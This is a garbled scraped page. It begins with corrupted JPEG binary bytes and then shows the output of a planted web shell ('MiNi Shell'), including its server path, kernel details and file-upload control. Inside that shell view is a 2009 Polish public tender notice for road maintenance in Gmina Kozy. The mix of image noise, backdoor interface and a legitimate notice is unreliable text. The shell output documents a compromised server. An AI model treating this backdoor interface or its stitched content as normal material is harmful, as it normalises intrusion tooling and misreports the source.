JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/59510-N-2009.html

<p class="kh_header"><b>Kozy: Bieżące utrzymanie dróg gminnych na terenie Gminy Kozy w latach 2009 - 2010</b><br>
<b>Numer ogłoszenia: 59510 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kozy , ul. Krakowska 4, 43-340 Kozy, woj. śląskie, tel. 033 8298650, faks 033 8298674.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg gminnych na terenie Gminy Kozy w latach 2009 - 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Orientacyjny zakres robót: 
-uzupełnienie uszkodzeń  o głębokości do 4 cm i pow. do 10m2 - ok.4500 m2 
- uzupełnienie uszkodzeń o głębokości większej niż 4 cm i pow. do10 m2 
   dopłata za każdy 1 cm grubości ponad 4 cm - ok.13.000 m2
- uzupełnienie uszkodzeń  dla powierzchni  większej od 10 m2 i gr.4cm - ok. 300 m2
-uzupełnienie podbudowy  kruszywem łamanym -  ok 5 m3 
- jednokrotne utrwalenie nawierzchni emulsją asfaltową i grysem kamiennym - ok. 60 Mg
- remont barier energochłonnych jednostronnych -  wymiana uszkodzonych elementów - ok. 45 mb
- wymiana przepustów z rur betonowych o śr.do 500 wraz ze ściankami
bocznymi - ok.20 mb
- wyrównanie poboczy korą asfaltową - ok 100 Mg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.posiadają uprawnienia do wykonywania określonej działalności lub czynności zgodnie z wymaganiami   ustawowymi. 
Ocena spełnienia warunku- dostarczenie dokumentu opisanego w części VI pkt. 2, pkt.15   Specyfikacji istotnych warunków zamówienia (siwz).  
2.Posiadają niezbędną wiedzę i doświadczenie.
Spełnienie warunku:-  wykonanie  w ciągu  ostatnich  5 lat przed dniem wszczęcia postępowania,  a  jeżeli  okres prowadzenia działalności jest krótszy, w tym okresie  przez wykonawcę co najmniej  dwóch (2) zadań  zbliżonych swoim rodzajem i wartością do  przedmiotu zamówienia i wartości nie niższej niż 200.000,00 zł brutto każde.
Ocena spełnienia warunku na podstawie dostarczonych dokumentów opisanych w części VI  pkt.3 siwz.
3.Dysponują potencjałem technicznym niezbędnym do wykonania zamówienia.
Spełnienie warunku -  dysponują sprzętem  niezbędnym do wykonania zadania : szczotki mechaniczne, skrapiarki lepiszcza, rozsypywarki kruszywa, środki transportowe, patchmatic, kompresor, kombajn do remontu nawierzchni emulsją i grysami.
Ocena spełnienia warunku na podstawie złożonego oświadczenia opisanego w części VI pkt 6 oraz 14 siwz.
4.Dysponują osobami zdolnymi do wykonania zamówienia.
Spełnienie warunku: -   dysponowanie min. 4 osobami legitymującymi się doświadczeniem , posiadającymi uprawnienia do obsługi  sprzętu przewidzianego do realizacji zamówienia oraz kierownikiem budowy z uprawnieniami do kierowania robotami drogowymi lub  przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób posiadających  takie doświadczenie i kwalifikacje.  
Ocena spełnienia warunku na podstawie dostarczonego dokumentu opisanego w części VI pkt 4 siwz.
5.Znajdują się w sytuacji ekonomicznej  i  finansowej zapewniającej wykonanie zamówienia.
Spełnienie warunku: - posiadanie środków własnych lub zdolności kredytowej w wysokości nie mniejszej niż 100.000,00 zł .     
Ocena spełnienia warunku na podstawie dostarczonego dokumentu opisanego w części VI pkt 5 siwz.                   
6.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Spełnienie warunku - nie podleganie wykluczeniu z postępowania na podstawie Art. 24. ust. 1 i ust. 2 ustawy Prawo zamówień publicznych - w przypadku wykonawców działających wspólnie (spółka cywilna, konsorcjum, itd.) dotyczy każdego współwykonawcy  z osobna.
Ocena spełnienia warunku na podstawie złożonego oświadczenia opisanego w części VI  pkt  6 siwz.
7.Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej objętej przedmiotem zamówienia.
Spełnienie warunku - złożenie kopii polisy ubezpieczeniowej lub innego dokumentu potwierdzającego że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
8.Akceptują warunki zawarte w niniejszej specyfikacji istotnych warunków zamówienia wraz z  załącznikami i przyjmują je bez zastrzeżeń.
Ocena spełnienia warunku na podstawie złożonego oświadczenia opisanego w części VI pkt 9        
Ocena spełnienia powyższych warunków będzie polegać na sprawdzeniu kompletności, poprawności złożonych dokumentów i oświadczeń według zasady: spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> ( cz. VI siwz).
1. Wypełniony formularz  ofertowy sporządzony na formularzu stanowiącym zał. Nr 1 siwz.  
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji  działalności gospodarczej (w przypadku przedsiębiorców występujących 
wspólnie - m.in.spółki cywilne,konsorcja - zaświadczenie o wpisie do ewidencji        
działalności gospodarczej lub odpis z właściwego rejestru każdego ze wspólników)  -wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Wykaz wykonanych przez wykonawcę w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie:
-co najmniej dwóch zadań odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia o wartości nie niższej niz 200.000,00 zł brutto każde.
W wykazie należy podać dane: przedmiot zamówienia , wartości oraz daty wykonania i odbioru, ( okres realizacji )  i odbiorców (miejsce wykonania)- zał.nr 7 do siwz, 
3.1 Dokumenty potwierdzające, że roboty ujęte w powyższym wykazie zostały wykonane należycie - dołączyć referencje, opinie zamawiających, z potwierdzeniem że zadanie wykonane  zostało należycie  
4. Oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia 
(zał. nr 2 do siwz)  oraz kserokopie odpowiednich uprawnień budowlanych, aktualnego zaświadczenia o wpisie do Okręgowej Izby inżynierów Budownictwa i ubezpieczenia od odpowiedzialności cywilnej kierownika budowy.   
Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, zakresu wykonywanych przez nich czynności - zał.nr 9 do siwz
Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeżeli w wykazie o którym mowa wyżej wykonawca wskazał osoby którymi będzie dysponował    
5. Oświadczenie o wysokości posiadanych środków finansowych lub zdolności
kredytowej   wykonawcy - z informacji tej winna wynikać konkretna kwota w wysokości nie mniejszej  niż 100.000,00 zł. 
6.  Oświadczenie  w  trybie Art. 22  ust. 1  ustawy  Prawo zamówień publicznych  (Dz.U. Nr 223 z 2007 r. poz.1655 ), zwanej dalej  pzp - Załącznik Nr 2 do nin.siwz.  
W przypadku wykonawców składających ofertę wspólnie (spółka cywilna, konsorcjum, itd.) każdy ze współwykonawców składa oświadczenie oddzielnie.      
7. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca  (w przypadku przedsiębiorców występujących wspólnie  zaświadczenie  każdego ze wspólników)   nie zalega  z  opłacaniem  podatków  lub zaświadczenie,  że wykonawca  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu  -  wystawione  nie wcześniej  niż 3 miesiące  przed  upływem  terminu składania ofert. 
8.   Aktualne  zaświadczenie  z  właściwego  oddziału  Zakładu  Ubezpieczeń 
Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego
potwierdzające, że wykonawca  (w przypadku przedsiębiorców występujących wspólnie zaświadczenie  każdego ze wspólników) nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
9.  Oświadczenie o:
-nie zaleganiu w opłacie należności ( podatków) na rzecz  właściwego urzędu gminy;                               
-związaniu złożoną przez siebie ofertą przez okres 30 dni od daty upływu terminu składania ofert;
-zdobyciu informacji koniecznych do sporządzenia oferty;
-zapoznaniu się oferenta z warunkami przetargu zawartymi w niniejszej specyfikacji istotnych warunków zamówienia wraz z jej załącznikami i przyjęciu tych warunków bez zastrzeżeń;
-terminie wykonania zamówienia;  
-o zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze  
umowy ( załącznik nr 4 do siwz ).                            
10.Wykaz robót  (części zamówienia), których  wykonanie Wykonawca zamierza 
powierzyć podwykonawcom.     
11. Wycenę przedmiotu zamówienia  sporządzoną ,  w oparciu o przedmiar robót,   
( zał nr 6 ) obejmujący  wycenę  poszczególnych  elementów   zamówienia  z  cenami jednostkowy ( kalkulacja ceny ofertowej ).
12. Pełnomocnictwo   ( w oryginale ) do reprezentowania podmiotów występujących wspólnie ( konsorcja, spółki cywilne ) . Z dokumentu powinien wynikać zakres  udzielonego pełnomocnictwa ( pełnomocnik powinien być powołany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie .
13. Polisa ubezpieczeniowa lub inny dokument potwierdzający że wykonawca jest  
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
14. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca zał.nr 8 do siwz. 
15  Kopię zezwolenia na wytwarzanie odpadów powstających podczas wykonywania robót budowlanych inżynierii lądowej  - decyzja dotycząca odpadów wytwarzanych na terenie  gminy Kozy zgodna z ustawą o odpadach i rozporządzeniem w sprawie katalogu odpadów ( DzU Nr 62 poz. 628 z późn. zm, DzU nr 112 poz. 1206 z póżn. zm.).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.kozy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej w pok. nr 12, Urząd Gminy w Kozach ul. Krakowska 4, cena 25 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 09:00, miejsce: sekretariat Urzędu Gminy Kozy, ul.Krakowska 4, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com